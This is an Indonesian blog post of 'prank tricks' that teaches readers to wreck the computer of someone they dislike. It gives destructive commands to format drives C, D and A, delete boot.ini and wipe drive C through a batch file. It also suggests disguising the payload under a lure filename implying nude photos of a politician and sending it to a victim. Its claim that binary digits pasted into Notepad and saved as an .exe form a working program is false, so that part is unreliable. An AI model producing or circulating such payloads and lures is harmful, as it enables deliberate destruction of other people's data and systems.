Trik Jahil 4


Coba buat komputer orang yg lw benci, jangan di coba dikomputer temen
apalagi di komputer kita sendiri
nih buat format ulang HDD
copy kode binary ini di notepad
Code:
01001011000111110010010101010101010000011111100000
save trus jadi’in file .exe.. pake namanya yg bikin orang pengen klik.misal megawati_bugil.exe, trus kirim ke komputer korban.. kalo udah di dobble klik, lw tau dong apa yg bakal terjadi..
nih ada pilihannya..:
format c: /Q/X — u/ format drive c:
Code:
01100110011011110111001001101101011000010111010000 10000001100011001110100101110000100000001011110101 00010010111101011000
format d: /Q/X — u/ format drive d:
Code:
01100110011011110111001001101101011000010111010000 10000001100100001110100101110000100000001011110101 00010010111101011000
format a: /Q/X — u/ format drive a:
Code:
01100110011011110111001001101101011000010111010000 10000001100001001110100101110000100000001011110101 00010010111101011000
Del /F/S/Q c:boot.ini — bikin komputer lw ga bisa booting
Code:
01100100011001010110110000100000001011110100011000 10111101010011001011110101000100100000011000110011 101001011100011000100110
111101 1011110111010000101110011010010110111001101001
gini juga bisa,hapus drive C:
Code:
@Echo off
Del C: *.*|y
save jadi dell.bat
udah segitu aja..

Nb. Semua resiko tergantung anda bukan penulis, disarankan Hati2.. OK !!!

comment 0 comments:

Post a Comment

 
© All 4 You... | Design by Blog template in collaboration with Concert Tickets, and Menopause symptoms
Powered by Blogger